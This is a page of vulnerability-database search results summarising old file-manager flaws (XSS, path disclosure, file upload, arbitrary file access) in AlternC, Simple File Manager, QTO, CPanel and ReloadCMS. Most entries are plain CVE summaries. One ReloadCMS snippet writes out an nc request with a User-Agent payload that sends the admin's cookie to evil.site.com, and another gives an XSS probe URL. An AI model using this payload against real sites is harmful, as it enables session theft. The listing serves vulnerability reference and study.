3141 matches found
CVE-2006-6256
Cross-site scripting (XSS) vulnerability in the file manager in admin/bro_main.php in AlternC 0.9.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a folder name...
CVE-2006-6257
The CVE-2006-6257 issue affects AlternC 0.9.5 and earlier, where PHP warning messages disclose sensitive path information when folder names include JavaScript-like strings. The root cause is information leakage via warning output, enabling remote attackers to learn partial path details. Impact is...
CVE-2006-6256
CVE-2006-6256 concerns a Cross-site Scripting (XSS) vulnerability in the file manager (admin/bro_main.php) of AlternC 0.9.5 and earlier. The flaw allows remote attackers to inject arbitrary web script or HTML via a folder name. Affected software is AlternC, up to version 0.9.5 (older). The connec...
simple file manager 0.24a - Multiple Vulnerabilities
simple file manager 0.24a - Multiple Vulnerabilities /\ | flame vrs Simple File Manager | | http://onedotoh.sourceforge.net/ | | Various Vulnerabilities Including: | / /+++++++++++++++++++++++++++++++++++++++++++\ | Using the scripts supplied by the webapp: | | Reading of Arbitrary files | |...
Simple File Manager 0.24a Multiple Remote Vulnerabilities
Exploit for unknown platform in category web applications ========================================================= Simple File Manager 0.24a Multiple Remote Vulnerabilities ========================================================= /\ | flame vrs Simple File Manager | |...
simple file manager 0.24a - Multiple Vulnerabilities
/\ | flame vrs Simple File Manager | | http://onedotoh.sourceforge.net/ | | Various Vulnerabilities Including: | / /+++++++++++++++++++++++++++++++++++++++++++\ | Using the scripts supplied by the webapp: | | Reading of Arbitrary files | | Deletion of Arbitrary files | | Modification of Arbitrary...
CPanel Multiple Cross Site Scripting
Aria-Security Team Advisory www.Aria-security.Com For English www.Aria-Security.net For Persian Original Advisory : http://aria-security.net/advisory/cpanel.txt ----------------------------------------------------------- Software: CPanel Tested On CPanel 10 CPanel file Manager: PoC:...
CVE-2006-4268
CubeCart
CVE-2006-3362
Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote...
QTO File Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/18791/info QTO File Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application. An attacker may leverage these issues to have arbitrary scrip...
qtofm.txt
+vendor : http://www.qto.com +poral : qto file manager +version : All version ! Exploit: +http://www.xxx.xom/qto/index.php?msg=xss...
CVE-2006-3160
Cross-site scripting (XSS) vulnerability in fm.php in ONEdotOH Simple File Manager (SFM) 0.24a and earlier allows remote attackers to inject arbitrary web script or HTML via the msg parameter...
CVE-2006-3160
The CVE-2006-3160 entry describes a Cross-Site Scripting (XSS) vulnerability in ONEdotOH Simple File Manager (SFM) up to version 0.24a, specifically in fm.php where the msg parameter can be leveraged to inject arbitrary script/HTML. The vulnerability affects the fm.php component and arises from i...
ReloadCMS-1.2.5.txt
nc target.host.com 80 GET /pathtoreloadcms/ HTTP/1.0 User-Agent: "window.open"http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL;window.close; Host: target.host.com Connection: Close So, when admin see site statistics through the administration panel, javascript will run Once...
ReloadCMS <= 1.2.5stable Cross site scripting / remote command execution
<?php /* ReloadCMS <= 1.2.5stable Cross site scripting / remote command execution software site: http://reloadcms.com/ description: "ReloadCMS is a free CMS written on PHP and based on flat files." vulnerability: ReloadCMS do not properly sanitize User-Agent request header before to store it in...
Qto File Manager 1.0 - index.php Cross-Site Scripting
Qto File Manager 1.0 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/18510/info Qto file manager is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this...
Qto File Manager 1.0 - 'index.php' Cross-Site Scripting
source: https://www.securityfocus.com/bid/18510/info Qto file manager is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute in the...
xinnet.com China new network Web Mail system has a serious vulnerability - a vulnerability warning - the black bar safety net
Long time no Post garbage come up, this also is not prepared to contribute, to the octal friend. First good luck to all octal friends a Happy New Year. Everyone knows China's famous New cafe, new network virtual host in a stable and secure known. Business users very much, I also bought a new...
Cross site scripting
Cross-site scripting (XSS) vulnerability in the file manager utility in Hummingbird Collaboration (aka Hummingbird Enterprise Collaboration) 5.21 and earlier allows remote attackers to inject arbitrary web script or HTML in an uploaded page, which is published without a check for hostile scripting...